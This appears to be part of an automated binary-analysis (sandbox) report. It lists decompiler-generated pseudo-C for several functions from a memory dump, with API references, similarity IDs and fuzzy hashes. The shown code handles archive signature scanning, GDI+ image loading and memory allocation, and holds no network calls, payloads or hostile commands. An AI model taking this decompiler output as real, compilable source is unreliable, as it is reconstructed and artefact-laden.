                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                Similarity
                • API ID: DirectoryLibraryLoadSystem
                • String ID:
                • API String ID: 1175261203-0
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 73%
                			E00CB938E(signed int __ecx, intOrPtr _a4, intOrPtr _a8) {
                				signed int _v8;
                				signed int* _t10;
                				signed int _t15;
                
                				_push(__ecx);
                				_t15 = __ecx;
                				_t10 =  &_v8;
                				_v8 = __ecx;
                				_v8 = _v8 & 0x00000000;
                				_push(_t10);
                				_push(_a4);
                				 *__ecx = 0xcd3398;
                				if(_a8 == 0) {
                					L00CBD80E(); // executed
                				} else {
                					L00CBD814();
                				}
                				 *((intOrPtr*)(_t15 + 8)) = _t10;
                				 *(_t15 + 4) = _v8;
                				return _t15;
                			}

                APIs
                • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00CB93AF
                • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 00CB93B6
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                Similarity
                • API ID: BitmapCreateFromGdipStream
                • String ID:
                • API String ID: 1918208029-0
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 58%
                			E00CB9B08(void* __ecx) {
                				intOrPtr _v16;
                				intOrPtr* _t5;
                				void* _t7;
                				void* _t11;
                				intOrPtr _t14;
                
                				 *[fs:0x0] = _t14;
                				_t5 =  *0xce75c0; // 0x7442c100
                				 *((intOrPtr*)( *_t5 + 8))(_t5, _t11,  *[fs:0x0], E00CD1161, 0xffffffff);
                				L00CBD826(); // executed
                				_t7 =  *0xcddff0( *((intOrPtr*)(__ecx + 4))); // executed
                				 *[fs:0x0] = _v16;
                				return _t7;
                			}

                APIs
                • GdiplusShutdown.GDIPLUS(?,?,?,00CD1161,000000FF), ref: 00CB9B31
                • OleUninitialize.OLE32(?,?,?,00CD1161,000000FF), ref: 00CB9B36
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                Similarity
                • API ID: GdiplusShutdownUninitialize
                • String ID:
                • API String ID: 3856339756-0
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 89%
                			E00CC1726(void* __ecx, void* __eflags) {
                				intOrPtr _t1;
                				void* _t2;
                				void* _t9;
                
                				_t1 = E00CC281A(__eflags, E00CC166A); // executed
                				 *0xcdd680 = _t1;
                				if(_t1 != 0xffffffff) {
                					_t2 = E00CC28C8(__eflags, _t1, 0xd001dc);
                					_pop(_t9);
                					__eflags = _t2;
                					if(_t2 != 0) {
                						return 1;
                					} else {
                						E00CC1759(_t9);
                						goto L1;
                					}
                				} else {
                					L1:
                					return 0;
                				}
                			}

                APIs
                  • Part of subcall function 00CC281A: try_get_function.LIBVCRUNTIME ref: 00CC282F
                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00CC1744
                • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00CC174F
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                Similarity
                • API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
                • String ID:
                • API String ID: 806969131-0
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 58%
                			E00CA12B2(struct HWND__* _a4, int _a8, signed char _a12) {
                				int _t8;
                
                				asm("sbb eax, eax");
                				_t8 = ShowWindow(GetDlgItem(_a4, _a8),  ~(_a12 & 0x000000ff) & 0x00000009); // executed
                				return _t8;
                			}

                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                Similarity
                • API ID: ItemShowWindow
                • String ID:
                • API String ID: 3351165006-0
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 95%
                			E00CA1973(intOrPtr* __ecx, intOrPtr __edx) {
                				signed int _t106;
                				intOrPtr _t109;
                				signed int _t110;
                				signed int _t112;
                				signed int _t116;
                				signed int _t119;
                				signed int _t127;
                				intOrPtr _t128;
                				char _t129;
                				char _t138;
                				intOrPtr _t143;
                				signed int _t144;
                				signed int _t145;
                				void* _t147;
                				signed int _t152;
                				signed int _t153;
                				signed int _t155;
                				void* _t159;
                				void* _t160;
                				signed int _t166;
                				intOrPtr* _t169;
                				signed int _t175;
                				void* _t176;
                				signed int _t178;
                				char* _t190;
                				intOrPtr _t191;
                				intOrPtr _t197;
                				intOrPtr* _t199;
                				signed int _t202;
                				void* _t204;
                				char* _t205;
                				intOrPtr _t206;
                				void* _t207;
                
                				_t197 = __edx;
                				_t169 = __ecx;
                				E00CBD870(E00CD1451, _t207);
                				_t199 = _t169;
                				_push(7);
                				_t164 = _t199 + 0x21f8;
                				_push(_t199 + 0x21f8);
                				 *((char*)(_t199 + 0x6cbc)) = 0;
                				 *((char*)(_t199 + 0x6cc4)) = 0;
                				if( *((intOrPtr*)( *_t199 + 0xc))() == 7) {
                					 *(_t199 + 0x6cc0) =  *(_t199 + 0x6cc0) & 0x00000000;
                					_t106 = E00CA1D09(_t164, 7);
                					__eflags = _t106;
                					if(_t106 == 0) {
                						E00CA6ED7(_t207 - 0x38, 0x200000);
                						 *(_t207 - 4) =  *(_t207 - 4) & 0x00000000;
                						_t109 =  *((intOrPtr*)( *_t199 + 0x14))();
                						_t197 =  *_t199;
                						 *((intOrPtr*)(_t207 - 0x18)) = _t109;
                						_t110 =  *((intOrPtr*)(_t197 + 0xc))( *((intOrPtr*)(_t207 - 0x38)),  *((intOrPtr*)(_t207 - 0x34)) + 0xfffffff0);
                						_t175 = _t110;
                						_t202 = 0;
                						 *(_t207 - 0x14) = _t175;
                						_t166 = 1;
                						__eflags = _t175;
                						if(_t175 <= 0) {
                							L22:
                							__eflags =  *(_t199 + 0x6cc0);
                							_t176 = _t207 - 0x38;
                							if( *(_t199 + 0x6cc0) != 0) {
                								_t37 = _t207 - 4; // executed
                								 *_t37 =  *(_t207 - 4) | 0xffffffff;
                								__eflags =  *_t37;
                								E00CA159C(_t176); // executed
                								L25:
                								_t112 =  *(_t199 + 0x6cb0);
                								__eflags = _t112 - 4;
                								if(__eflags != 0) {
                									__eflags = _t112 - 3;
                									if(_t112 != 3) {
                										 *((intOrPtr*)(_t199 + 0x2200)) = 7;
                										L32:
                										 *((char*)(_t207 - 0xd)) = 0;
                										__eflags = E00CA391A(_t199, _t197);
                										 *(_t207 - 0xe) = 0;
                										__eflags = 0 - 1;
                										if(0 != 1) {
                											L38:
                											_t116 =  *((intOrPtr*)(_t207 - 0xd));
                											L39:
                											_t178 =  *((intOrPtr*)(_t199 + 0x6cc5));
                											__eflags = _t178;
                											if(_t178 == 0) {
                												L41:
                												__eflags =  *((char*)(_t199 + 0x6cc4));
                												if( *((char*)(_t199 + 0x6cc4)) != 0) {
                													L43:
                													__eflags = _t178;
                													if(__eflags == 0) {
                														E00CA134C(__eflags, 0x1b, _t199 + 0x1e);
                													}
                													__eflags =  *((char*)(_t207 + 8));
                													if( *((char*)(_t207 + 8)) != 0) {
                														L48:
                														__eflags =  *(_t207 - 0xe);
                														 *((char*)(_t199 + 0x6cb6)) =  *((intOrPtr*)(_t199 + 0x2224));
                														if( *(_t207 - 0xe) == 0) {
                															L69:
                															__eflags =  *((char*)(_t199 + 0x6cb5));
                															if( *((char*)(_t199 + 0x6cb5)) == 0) {
                																L71:
                																E00CAFAB1(_t199 + 0x6cfa, _t199 + 0x1e, 0x800);
                																L72:
                																_t119 = _t166;
                																goto L73;
                															}
                															__eflags =  *((char*)(_t199 + 0x6cb9));
                															if( *((char*)(_t199 + 0x6cb9)) == 0) {
                																goto L72;
                															}
                															goto L71;
                														}
                														__eflags =  *((char*)(_t199 + 0x21e0));
                														if( *((char*)(_t199 + 0x21e0)) == 0) {
                															L51:
                															_t204 =  *((intOrPtr*)( *_t199 + 0x14))();
                															 *((intOrPtr*)(_t207 - 0x24)) = _t197;
                															 *((intOrPtr*)(_t207 + 8)) =  *((intOrPtr*)(_t199 + 0x6ca0));
                															 *((intOrPtr*)(_t207 - 0x18)) =  *((intOrPtr*)(_t199 + 0x6ca4));
                															 *(_t207 - 0x14) =  *(_t199 + 0x6ca8);
                															 *((intOrPtr*)(_t207 - 0x1c)) =  *((intOrPtr*)(_t199 + 0x6cac));
                															 *((intOrPtr*)(_t207 - 0x20)) =  *((intOrPtr*)(_t199 + 0x21dc));
                															while(1) {
                																_t127 = E00CA391A(_t199, _t197);
                																__eflags = _t127;
                																if(_t127 == 0) {
                																	break;
                																}
                																_t128 =  *((intOrPtr*)(_t199 + 0x21dc));
                																__eflags = _t128 - 3;
                																if(_t128 != 3) {
                																	__eflags = _t128 - 2;
                																	if(_t128 == 2) {
                																		__eflags =  *((char*)(_t199 + 0x6cb5));
                																		if( *((char*)(_t199 + 0x6cb5)) == 0) {
                																			L66:
                																			_t129 = 0;
                																			__eflags = 0;
                																			L67:
                																			 *((char*)(_t199 + 0x6cb9)) = _t129;
                																			L68:
                																			 *((intOrPtr*)(_t199 + 0x6ca0)) =  *((intOrPtr*)(_t207 + 8));
                																			 *((intOrPtr*)(_t199 + 0x6ca4)) =  *((intOrPtr*)(_t207 - 0x18));
                																			 *(_t199 + 0x6ca8) =  *(_t207 - 0x14);
                																			 *((intOrPtr*)(_t199 + 0x6cac)) =  *((intOrPtr*)(_t207 - 0x1c));
                																			 *((intOrPtr*)(_t199 + 0x21dc)) =  *((intOrPtr*)(_t207 - 0x20));
                																			 *((intOrPtr*)( *_t199 + 0x10))(_t204,  *((intOrPtr*)(_t207 - 0x24)), 0);
                																			goto L69;
                																		}
                																		__eflags =  *((char*)(_t199 + 0x3318));
                																		if( *((char*)(_t199 + 0x3318)) != 0) {
                																			goto L66;
                																		}
                																		_t129 = _t166;
                																		goto L67;
                																	}
                																	__eflags = _t128 - 5;
                																	if(_t128 == 5) {
                																		goto L68;
                																	}
                																	L60:
                																	E00CA1E3B(_t199);
                																	continue;
                																}
                																__eflags =  *((char*)(_t199 + 0x6cb5));
                																if( *((char*)(_t199 + 0x6cb5)) == 0) {
                																	L56:
                																	_t138 = 0;
                																	__eflags = 0;
                																	L57:
                																	 *((char*)(_t199 + 0x6cb9)) = _t138;
                																	goto L60;
                																}
                																__eflags =  *((char*)(_t199 + 0x5668));
                																if( *((char*)(_t199 + 0x5668)) != 0) {
                																	goto L56;
                																}
                																_t138 = _t166;
                																goto L57;
                															}
                															goto L68;
                														}
                														__eflags =  *((char*)(_t199 + 0x6cbc));
                														if( *((char*)(_t199 + 0x6cbc)) != 0) {
                															goto L69;
                														}
                														goto L51;
                													} else {
                														L46:
                														_t119 = 0;
                														L73:
                														L74:
                														 *[fs:0x0] =  *((intOrPtr*)(_t207 - 0xc));
                														return _t119;
                													}
                												}
                												__eflags = _t116;
                												if(_t116 != 0) {
                													goto L48;
                												}
                												goto L43;
                											}
                											__eflags =  *((char*)(_t207 + 8));
                											if( *((char*)(_t207 + 8)) == 0) {
                												goto L46;
                											}
                											goto L41;
                										}
                										__eflags = 0;
                										 *((char*)(_t207 - 0xd)) = 0;
                										while(1) {
                											E00CA1E3B(_t199);
                											_t143 =  *((intOrPtr*)(_t199 + 0x21dc));
                											__eflags = _t143 - _t166;
                											if(_t143 == _t166) {
                												break;
                											}
                											__eflags =  *((char*)(_t199 + 0x21e0));
                											if( *((char*)(_t199 + 0x21e0)) == 0) {
                												L37:
                												_t144 = E00CA391A(_t199, _t197);
                												__eflags = _t144;
                												_t145 = _t144 & 0xffffff00 | _t144 != 0x00000000;
                												 *(_t207 - 0xe) = _t145;
                												__eflags = _t145 - 1;
                												if(_t145 == 1) {
                													continue;
                												}
                												goto L38;
                											}
                											__eflags = _t143 - 4;
                											if(_t143 == 4) {
                												break;
                											}
                											goto L37;
                										}
                										_t116 = _t166;
                										goto L39;
                									}
                									_t205 = _t199 + 0x21ff;
                									_t147 =  *((intOrPtr*)( *_t199 + 0xc))(_t205, _t166);
                									__eflags = _t147 - _t166;
                									if(_t147 != _t166) {
                										goto L46;
                									}
                									__eflags =  *_t205;
                									if( *_t205 != 0) {
                										goto L46;
                									}
                									 *((intOrPtr*)(_t199 + 0x2200)) = 8;
                									goto L32;
                								}
                								E00CA134C(__eflags, 0x3c, _t199 + 0x1e);
                								goto L46;
                							}
                							E00CA159C(_t176);
                							goto L46;
                						} else {
                							goto L6;
                						}
                						do {
                							L6:
                							_t190 =  *((intOrPtr*)(_t207 - 0x38)) + _t202;
                							__eflags =  *_t190 - 0x52;
                							if( *_t190 != 0x52) {
                								goto L17;
                							}
                							_t152 = E00CA1D09(_t190, _t110 - _t202);
                							__eflags = _t152;
                							if(_t152 == 0) {
                								L16:
                								_t110 =  *(_t207 - 0x14);
                								goto L17;
                							}
                							_t191 =  *((intOrPtr*)(_t207 - 0x18));
                							 *(_t199 + 0x6cb0) = _t152;
                							__eflags = _t152 - _t166;
                							if(_t152 != _t166) {
                								L19:
                								_t197 =  *_t199;
                								_t153 = _t202 + _t191;
                								 *(_t199 + 0x6cc0) = _t153;
                								 *((intOrPtr*)(_t197 + 0x10))(_t153, 0, 0);
                								_t155 =  *(_t199 + 0x6cb0);
                								__eflags = _t155 - 2;
                								if(_t155 == 2) {
                									L21:
                									 *((intOrPtr*)( *_t199 + 0xc))(_t199 + 0x21f8, 7);
                									goto L22;
                								}
                								__eflags = _t155 - 3;
                								if(_t155 != 3) {
                									goto L22;
                								}
                								goto L21;
                							}
                							__eflags = _t202;
                							if(_t202 <= 0) {
                								goto L19;
                							}
                							__eflags = _t191 - 0x1c;
                							if(_t191 >= 0x1c) {
                								goto L19;
                							}
                							__eflags =  *(_t207 - 0x14) - 0x1f;
                							if( *(_t207 - 0x14) <= 0x1f) {
                								goto L19;
                							}
                							_t159 =  *((intOrPtr*)(_t207 - 0x38)) - _t191;
                							__eflags =  *((char*)(_t159 + 0x1c)) - 0x52;
                							if( *((char*)(_t159 + 0x1c)) != 0x52) {
                								goto L16;
                							}
                							__eflags =  *((char*)(_t159 + 0x1d)) - 0x53;
                							if( *((char*)(_t159 + 0x1d)) != 0x53) {
                								goto L16;
                							}
                							__eflags =  *((char*)(_t159 + 0x1e)) - 0x46;
                							if( *((char*)(_t159 + 0x1e)) != 0x46) {
                								goto L16;
                							}
                							__eflags =  *((char*)(_t159 + 0x1f)) - 0x58;
                							if( *((char*)(_t159 + 0x1f)) == 0x58) {
                								goto L19;
                							}
                							goto L16;
                							L17:
                							_t202 = _t202 + 1;
                							__eflags = _t202 - _t110;
                						} while (_t202 < _t110);
                						goto L22;
                					}
                					 *(_t199 + 0x6cb0) = _t106;
                					_t166 = 1;
                					__eflags = _t106 - 1;
                					if(_t106 == 1) {
                						_t206 =  *_t199;
                						_t160 =  *((intOrPtr*)(_t206 + 0x14))(0);
                						asm("sbb edx, 0x0");
                						 *((intOrPtr*)(_t206 + 0x10))(_t160 - 7, _t197);
                					}
                					goto L25;
                				}
                				_t119 = 0;
                				goto L74;
                			}





































                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp
                Similarity
                • API ID: H_prolog
                • String ID:
                • API String ID: 3519838083-0
                • Opcode ID: e08fb526c9345db965c2aac50dc0af7468a815eba7e33f697fde1e5b6ae8c76a
                • Instruction ID: 77eeaa20e01f6bf42cf61286e7f4e46de9702f737fea2e70410856b871fbb767
                • Opcode Fuzzy Hash: e08fb526c9345db965c2aac50dc0af7468a815eba7e33f697fde1e5b6ae8c76a
                • Instruction Fuzzy Hash: 01B1C170A04647AFEB18CF74C484BB9FBE6AF0631CF1C4259E86597281D730AE54DB91
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 91%
                			E00CA81C4(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __eflags) {
                				void* __esi;
                				void* _t47;
                				signed int _t50;
                				signed int _t51;
                				void* _t53;
                				signed int _t55;
                				signed int _t61;
                				intOrPtr _t73;
                				signed int _t80;
                				intOrPtr _t88;
                				void* _t89;
                				void* _t91;
                				intOrPtr _t93;
                				void* _t95;
                				void* _t98;
                
                				_t98 = __eflags;
                				_t90 = __edi;
                				_t88 = __edx;
                				_t73 = __ecx;
                				E00CBD870(E00CD12D2, _t95);
                				E00CBD940();
                				_t93 = _t73;
                				_t1 = _t95 - 0x9d58; // -38232
                				E00CA137D(_t1, _t88, __edi, _t98,  *(_t93 + 8));
                				 *(_t95 - 4) =  *(_t95 - 4) & 0x00000000;
                				_t6 = _t95 - 0x9d58; // -38232
                				if(E00CA9C0E(_t6, _t93 + 0xf4) != 0) {
                					_t7 = _t95 - 0x9d58; // -38232, executed
                					_t47 = E00CA1973(_t7, _t88, 1); // executed
                					if(_t47 != 0) {
                						__eflags =  *((char*)(_t95 - 0x3093));
                						if( *((char*)(_t95 - 0x3093)) == 0) {
                							_push(__edi);
                							_t91 = 0;
                							__eflags =  *(_t95 - 0x30a3);
                							if( *(_t95 - 0x30a3) != 0) {
                								_t10 = _t95 - 0x9d3a; // -38202
                								_t11 = _t95 - 0x1010; // -2064
                								_t61 = E00CAFAB1(_t11, _t10, 0x800);
                								__eflags =  *(_t95 - 0x309e);
                								while(1) {
                									_t17 = _t95 - 0x1010; // -2064
                									E00CAB782(_t17, 0x800, (_t61 & 0xffffff00 | __eflags == 0x00000000) & 0x000000ff);
                									_t18 = _t95 - 0x2058; // -6232
                									E00CA6EF9(_t18);
                									_push(0);
                									_t19 = _t95 - 0x2058; // -6232
                									_t20 = _t95 - 0x1010; // -2064
                									_t61 = E00CAA1B1(_t18, _t88, __eflags, _t20, _t19);
                									__eflags = _t61;
                									if(_t61 == 0) {
                										break;
                									}
                									_t91 = _t91 +  *((intOrPtr*)(_t95 - 0x1058));
                									asm("adc ebx, [ebp-0x1054]");
                									__eflags =  *(_t95 - 0x309e);
                								}
                								 *((intOrPtr*)(_t93 + 0x98)) =  *((intOrPtr*)(_t93 + 0x98)) + _t91;
                								asm("adc [esi+0x9c], ebx");
                							}
                							_t23 = _t95 - 0x9d58; // -38232
                							E00CA835C(_t93, _t88, _t23);
                							_t50 =  *(_t93 + 8);
                							_t89 = 0x49;
                							_pop(_t90);
                							_t80 =  *(_t50 + 0x82f2) & 0x0000ffff;
                							__eflags = _t80 - 0x54;
                							if(_t80 == 0x54) {
                								L11:
                								 *((char*)(_t50 + 0x61f9)) = 1;
                							} else {
                								__eflags = _t80 - _t89;
                								if(_t80 == _t89) {
                									goto L11;
                								}
                							}
                							_t51 =  *(_t93 + 8);
                							__eflags =  *((intOrPtr*)(_t51 + 0x82f2)) - _t89;
                							if( *((intOrPtr*)(_t51 + 0x82f2)) != _t89) {
                								__eflags =  *((char*)(_t51 + 0x61f9));
                								_t32 =  *((char*)(_t51 + 0x61f9)) == 0;
                								__eflags =  *((char*)(_t51 + 0x61f9)) == 0;
                								E00CB0FBD((_t51 & 0xffffff00 | _t32) & 0x000000ff, (_t51 & 0xffffff00 | _t32) & 0x000000ff, _t93 + 0xf4);
                							}
                							_t33 = _t95 - 0x9d58; // -38232
                							E00CA1E4F(_t33, _t89);
                							do {
                								_t34 = _t95 - 0x9d58; // -38232
                								_t53 = E00CA391A(_t34, _t89);
                								_t35 = _t95 - 0xd; // 0x7f3
                								_t36 = _t95 - 0x9d58; // -38232
                								_t55 = E00CA83C0(_t93, _t36, _t53, _t35); // executed
                								__eflags = _t55;
                							} while (_t55 != 0);
                						}
                					} else {
                						E00CA6E03(0xce00e0, 1);
                					}
                				}
                				_t37 = _t95 - 0x9d58; // -38232, executed
                				E00CA162D(_t37, _t90, _t93); // executed
                				 *[fs:0x0] =  *((intOrPtr*)(_t95 - 0xc));
                				return 0;
                			}

                APIs
                • __EH_prolog.LIBCMT ref: 00CA81C9
                  • Part of subcall function 00CA137D: __EH_prolog.LIBCMT ref: 00CA1382
                  • Part of subcall function 00CA137D: new.LIBCMT ref: 00CA13FA
                  • Part of subcall function 00CA1973: __EH_prolog.LIBCMT ref: 00CA1978
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp
                Similarity
                • API ID: H_prolog
                • String ID:
                • API String ID: 3519838083-0
                • Opcode ID: a1fd564dfa50585e3bffd56c1604404e12b37170ff8d2eab7bb651dbb655e0e3
                • Instruction ID: f8254a7918d46d40c129e19264a330dc8d1173fc54dec069af4918ae175fdf79
                • Opcode Fuzzy Hash: a1fd564dfa50585e3bffd56c1604404e12b37170ff8d2eab7bb651dbb655e0e3
                • Instruction Fuzzy Hash: F741B2719406559BDF24EB61C855BFAB378AF02708F0400EAE59AA3093DF745FC8EB50
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 72%
                			E00CB2A7F(void* __ecx, void* __edx) {
                				void* __edi;
                				void* __esi;
                				void* _t29;
                				signed int _t30;
                				signed int* _t36;
                				signed int _t38;
                				intOrPtr _t39;
                				intOrPtr _t42;
                				signed int _t44;
                				void* _t47;
                				void* _t48;
                				void* _t56;
                				void* _t60;
                				signed int _t65;
                				void* _t67;
                				void* _t69;
                				void* _t73;
                
                				_t56 = __edx;
                				_t48 = __ecx;
                				_t29 = E00CBD870(E00CD1486, _t67);
                				_push(_t48);
                				_push(_t48);
                				_t60 = _t48;
                				_t44 = 0;
                				_t72 =  *((intOrPtr*)(_t60 + 0x20));
                				if( *((intOrPtr*)(_t60 + 0x20)) == 0) {
                					_push(0x400400); // executed
                					_t42 = E00CBDB02(_t48, _t56, 0x400400, _t72); // executed
                					 *((intOrPtr*)(_t60 + 0x20)) = _t42;
                					_t29 = E00CBE920(_t60, _t42, 0, 0x400400);
                					_t69 = _t69 + 0x10;
                				}
                				_t73 =  *(_t60 + 0x18) - _t44;
                				if(_t73 == 0) {
                					_t65 =  *((intOrPtr*)(_t60 + 0x1c)) +  *((intOrPtr*)(_t60 + 0x1c));
                					_t30 = _t65;
                					 *(_t67 - 0x10) = _t65;
                					_t58 = _t30 * 0x4ae4 >> 0x20;
                					_push( ~(0 | _t73 > 0x00000000) | ( ~(_t73 > 0) | _t30 * 0x00004ae4) + 0x00000004);
                					_t36 = E00CBDB02(( ~(_t73 > 0) | _t30 * 0x00004ae4) + 4, _t30 * 0x4ae4 >> 0x20, _t65, _t73);
                					_pop(0xce00e0);
                					 *(_t67 - 0x14) = _t36;
                					 *(_t67 - 4) = _t44;
                					_t74 = _t36;
                					if(_t36 != 0) {
                						_push(E00CB1788);
                						_push(E00CB1611);
                						_push(_t65);
                						_t16 =  &(_t36[1]); // 0x4
                						_t44 = _t16;
                						 *_t36 = _t65;
                						_push(0x4ae4);
                						_push(_t44);
                						E00CBD96D(_t58, _t74);
                					}
                					 *(_t67 - 4) =  *(_t67 - 4) | 0xffffffff;
                					 *(_t60 + 0x18) = _t44;
                					_t29 = E00CBE920(_t60, _t44, 0, _t65 * 0x4ae4);
                					if(_t65 != 0) {
                						_t38 = 0;
                						 *(_t67 - 0x10) = 0;
                						do {
                							_t47 =  *(_t60 + 0x18) + _t38;
                							if( *((intOrPtr*)(_t47 + 0x4ad4)) == 0) {
                								 *((intOrPtr*)(_t47 + 0x4adc)) = 0x4100;
                								_t39 = E00CC2B53(0xce00e0); // executed
                								 *((intOrPtr*)(_t47 + 0x4ad4)) = _t39;
                								0xce00e0 = 0x30c00;
                								if(_t39 == 0) {
                									E00CA6D3A(0xce00e0);
                								}
                								_t38 =  *(_t67 - 0x10);
                							}
                							_t38 = _t38 + 0x4ae4;
                							 *(_t67 - 0x10) = _t38;
                							_t65 = _t65 - 1;
                						} while (_t65 != 0);
                					}
                				}
                				 *[fs:0x0] =  *((intOrPtr*)(_t67 - 0xc));
                				return _t29;
                			}

                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp
                Similarity
                • API ID: H_prolog
                • String ID:
                • API String ID: 3519838083-0
                • Opcode ID: c784770baeb8f27065feff2a56bc1d03b885c5e7345836b3316dd08a4964acca
                • Instruction ID: 2f1ca57771655732828c4ec46cbc43986d471dbf66623bc6afcb2096af7b3c53
                • Opcode Fuzzy Hash: c784770baeb8f27065feff2a56bc1d03b885c5e7345836b3316dd08a4964acca
                • Instruction Fuzzy Hash: 8221F6B1E40215AFDB14DF74CC41AEBB7A8EF15714F04423AE91AEB681E7709E00C6E8
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 83%
                			E00CB9EEF(void* __ecx, void* __edx, void* __eflags) {
                				void* __edi;
                				void* __esi;
                				short _t33;
                				char _t36;
                				void* _t47;
                				void* _t50;
                				short _t55;
                				void* _t57;
                				void* _t58;
                				short _t60;
                				void* _t62;
                				intOrPtr _t64;
                				void* _t67;
                
                				_t67 = __eflags;
                				_t57 = __edx;
                				_t47 = __ecx;
                				E00CBD870(E00CD14E1, _t62);
                				_push(_t47);
                				E00CBD940();
                				_push(_t60);
                				_push(_t58);
                				 *((intOrPtr*)(_t62 - 0x10)) = _t64;
                				 *((intOrPtr*)(_t62 - 4)) = 0;
                				E00CA137D(_t62 - 0x7d24, _t57, _t58, _t67, 0); // executed
                				 *((char*)(_t62 - 4)) = 1;
                				E00CA1E9E(_t62 - 0x7d24, _t57, _t62, _t67,  *((intOrPtr*)(_t62 + 0xc)));
                				if( *((intOrPtr*)(_t62 - 0x105f)) == 0) {
                					 *((intOrPtr*)(_t62 - 0x24)) = 0;
                					 *((intOrPtr*)(_t62 - 0x20)) = 0;
                					 *((intOrPtr*)(_t62 - 0x1c)) = 0;
                					 *((intOrPtr*)(_t62 - 0x18)) = 0;
                					 *((char*)(_t62 - 0x14)) = 0;
                					 *((char*)(_t62 - 4)) = 2;
                					_t50 = _t62 - 0x7d24;
                					_t33 = E00CA192E(_t57, _t62 - 0x24);
                					__eflags = _t33;
                					if(_t33 != 0) {
                						_t60 =  *((intOrPtr*)(_t62 - 0x20));
                						_t58 = _t60 + _t60;
                						_push(_t58 + 2);
                						_t55 = E00CC2B53(_t50);
                						 *((intOrPtr*)( *((intOrPtr*)(_t62 + 0x10)))) = _t55;
                						__eflags = _t55;
                						if(_t55 != 0) {
                							__eflags = 0;
                							 *((short*)(_t58 + _t55)) = 0;
                							E00CBEA80(_t55,  *((intOrPtr*)(_t62 - 0x24)), _t58);
                						} else {
                							_t60 = 0;
                						}
                						 *((intOrPtr*)( *((intOrPtr*)(_t62 + 0x14)))) = _t60;
                					}
                					E00CA15E3(_t62 - 0x24);
                					E00CA162D(_t62 - 0x7d24, _t58, _t60); // executed
                					_t36 = 1;
                				} else {
                					E00CA162D(_t62 - 0x7d24, _t58, _t60);
                					_t36 = 0;
                				}
                				 *[fs:0x0] =  *((intOrPtr*)(_t62 - 0xc));
                				return _t36;
                			}

                APIs
                • __EH_prolog.LIBCMT ref: 00CB9EF4
                  • Part of subcall function 00CA137D: __EH_prolog.LIBCMT ref: 00CA1382
                  • Part of subcall function 00CA137D: new.LIBCMT ref: 00CA13FA
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp
                Similarity
                • API ID: H_prolog
                • String ID:
                • API String ID: 3519838083-0
                • Opcode ID: 699c008ffd62e5557cbd34620ef17c41f5d975cd4d8dd561c18dacdf06a9cab4
                • Instruction ID: ea2bd522637c2c2021e57f18aa5b6132945b95c5bbf1c082528e38df61bfabbe
                • Opcode Fuzzy Hash: 699c008ffd62e5557cbd34620ef17c41f5d975cd4d8dd561c18dacdf06a9cab4
